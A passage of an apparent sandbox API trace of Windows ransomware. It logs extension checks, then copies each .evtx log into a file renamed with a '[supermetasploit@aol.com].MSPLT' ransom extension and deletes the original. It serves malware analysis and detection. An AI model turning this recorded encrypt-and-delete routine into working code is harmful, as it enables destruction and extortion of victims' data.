-1 [0290.003] lstrlenW (lpString=".rar") returned 4 [0290.003] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString=".bz2") returned 4 [0290.003] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString=".7z") returned 3 [0290.003] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.003] lstrlenW (lpString=".dbf") returned 4 [0290.003] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.003] lstrlenW (lpString=".1cd") returned 4 [0290.003] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.003] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.004] lstrlenW (lpString=".jpg") returned 4 [0290.004] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.004] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.004] lstrlenW (lpString=".doc") returned 4 [0290.004] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString=".docx") returned 5 [0290.004] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.004] lstrlenW (lpString=".pdf") returned 4 [0290.004] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString=".xls") returned 4 [0290.004] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString=".xlsx") returned 5 [0290.004] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.004] lstrlenW (lpString=".ppt") returned 4 [0290.004] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.004] lstrlenW (lpString=".zip") returned 4 [0290.004] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString=".rar") returned 4 [0290.004] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.004] lstrlenW (lpString=".bz2") returned 4 [0290.005] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.005] lstrlenW (lpString=".7z") returned 3 [0290.005] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.005] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.005] lstrlenW (lpString=".dbf") returned 4 [0290.005] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.005] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.005] lstrlenW (lpString=".1cd") returned 4 [0290.005] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.005] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 51 [0290.005] lstrlenW (lpString=".jpg") returned 4 [0290.005] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.007] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.007] lstrlenW (lpString="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 59 [0290.007] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0290.008] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0290.008] CloseHandle (hObject=0x44c) returned 1 [0290.008] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 0x20 [0290.008] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.008] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0290.008] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.008] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.008] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0290.009] GetLastError () returned 0x0 [0290.009] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0290.022] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0290.024] ReadFile (in: hFile=0x44c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0290.025] WriteFile (in: hFile=0x45c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x14a, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x14a, lpOverlapped=0x0) returned 1 [0290.025] SetEndOfFile (hFile=0x45c) returned 1 [0290.025] CloseHandle (hObject=0x45c) returned 1 [0290.031] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.031] SetEndOfFile (hFile=0x44c) returned 1 [0290.033] CloseHandle (hObject=0x44c) returned 1 [0290.033] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.034] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 1 [0290.034] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.034] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.034] lstrlenW (lpString=".doc") returned 4 [0290.034] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.034] lstrlenW (lpString=".docx") returned 5 [0290.034] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.034] lstrlenW (lpString=".pdf") returned 4 [0290.034] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.034] lstrlenW (lpString=".xls") returned 4 [0290.034] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.034] lstrlenW (lpString=".xlsx") returned 5 [0290.034] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.034] lstrlenW (lpString=".ppt") returned 4 [0290.034] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.034] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString=".zip") returned 4 [0290.035] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString=".rar") returned 4 [0290.035] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString=".bz2") returned 4 [0290.035] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString=".7z") returned 3 [0290.035] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.035] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString=".dbf") returned 4 [0290.035] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString=".1cd") returned 4 [0290.035] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString=".jpg") returned 4 [0290.035] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.035] lstrlenW (lpString=".doc") returned 4 [0290.035] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.035] lstrlenW (lpString=".docx") returned 5 [0290.035] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.035] lstrlenW (lpString=".pdf") returned 4 [0290.035] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString=".xls") returned 4 [0290.036] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString=".xlsx") returned 5 [0290.036] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.036] lstrlenW (lpString=".ppt") returned 4 [0290.036] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.036] lstrlenW (lpString=".zip") returned 4 [0290.036] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString=".rar") returned 4 [0290.036] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString=".bz2") returned 4 [0290.036] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString=".7z") returned 3 [0290.036] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.036] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.036] lstrlenW (lpString=".dbf") returned 4 [0290.036] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.036] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.036] lstrlenW (lpString=".1cd") returned 4 [0290.036] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.341] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned 67 [0290.341] lstrlenW (lpString=".jpg") returned 4 [0290.341] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.341] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.358] lstrlenW (lpString="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 47 [0290.358] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0290.884] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0290.884] CloseHandle (hObject=0x434) returned 1 [0290.885] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 0x20 [0290.885] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.885] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0290.885] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.885] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.885] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.887] GetLastError () returned 0x0 [0290.887] ReadFile (in: hFile=0x434, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0290.913] WriteFile (in: hFile=0x454, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0290.916] ReadFile (in: hFile=0x434, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0290.916] WriteFile (in: hFile=0x454, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x132, lpOverlapped=0x0) returned 1 [0290.916] SetEndOfFile (hFile=0x454) returned 1 [0290.917] CloseHandle (hObject=0x454) returned 1 [0290.920] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.920] SetEndOfFile (hFile=0x434) returned 1 [0290.923] CloseHandle (hObject=0x434) returned 1 [0290.923] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.924] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx")) returned 1 [0290.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.924] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.924] lstrlenW (lpString=".doc") returned 4 [0290.924] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.924] lstrlenW (lpString=".docx") returned 5 [0290.924] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.924] lstrlenW (lpString=".pdf") returned 4 [0290.924] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.924] lstrlenW (lpString=".xls") returned 4 [0290.924] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.924] lstrlenW (lpString=".xlsx") returned 5 [0290.925] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.925] lstrlenW (lpString=".ppt") returned 4 [0290.925] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.925] lstrlenW (lpString=".zip") returned 4 [0290.925] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString=".rar") returned 4 [0290.925] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString=".bz2") returned 4 [0290.925] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString=".7z") returned 3 [0290.925] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.925] lstrlenW (lpString=".dbf") returned 4 [0290.925] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.925] lstrlenW (lpString=".1cd") returned 4 [0290.925] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.925] lstrlenW (lpString=".jpg") returned 4 [0290.925] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.925] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.926] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.926] lstrlenW (lpString=".doc") returned 4 [0290.926] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".docx") returned 5 [0290.926] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.926] lstrlenW (lpString=".pdf") returned 4 [0290.926] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".xls") returned 4 [0290.926] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".xlsx") returned 5 [0290.926] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.926] lstrlenW (lpString=".ppt") returned 4 [0290.926] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.926] lstrlenW (lpString=".zip") returned 4 [0290.926] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".rar") returned 4 [0290.926] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".bz2") returned 4 [0290.926] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.926] lstrlenW (lpString=".7z") returned 3 [0290.926] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.927] lstrlenW (lpString=".dbf") returned 4 [0290.927] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.927] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0290.927] lstrlenW (lpString=".1cd") returned 4 [0290.927] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.132] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 55 [0291.132] lstrlenW (lpString=".jpg") returned 4 [0291.132] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.132] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.132] lstrlenW (lpString="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 49 [0291.132] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.331] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0291.332] CloseHandle (hObject=0x440) returned 1 [0291.332] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 0x20 [0291.332] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.336] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0291.336] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.336] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.337] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0291.337] GetLastError () returned 0x0 [0291.337] ReadFile (in: hFile=0x434, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.733] WriteFile (in: hFile=0x454, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.735] ReadFile (in: hFile=0x434, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0291.736] WriteFile (in: hFile=0x454, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x136, lpOverlapped=0x0) returned 1 [0291.736] SetEndOfFile (hFile=0x454) returned 1 [0291.736] CloseHandle (hObject=0x454) returned 1 [0291.739] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0291.739] SetEndOfFile (hFile=0x434) returned 1 [0291.742] CloseHandle (hObject=0x434) returned 1 [0291.742] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.743] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-eventtracing%4admin.evtx")) returned 1 [0291.758] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.758] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.758] lstrlenW (lpString=".doc") returned 4 [0291.758] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.758] lstrlenW (lpString=".docx") returned 5 [0291.758] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.758] lstrlenW (lpString=".pdf") returned 4 [0291.758] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.758] lstrlenW (lpString=".xls") returned 4 [0291.759] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString=".xlsx") returned 5 [0291.759] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.759] lstrlenW (lpString=".ppt") returned 4 [0291.759] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString=".zip") returned 4 [0291.759] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString=".rar") returned 4 [0291.759] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString=".bz2") returned 4 [0291.759] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString=".7z") returned 3 [0291.759] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString=".dbf") returned 4 [0291.759] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString=".1cd") returned 4 [0291.759] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString=".jpg") returned 4 [0291.759] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx") returned 57 [0291.759] lstrlenW (lpString=".doc") returned 4 [0291.760] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.760] lstrlenW (lpString=".docx") returned 5 [0291.760] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.760] lstrlenW (lpString=".pdf") returned 4 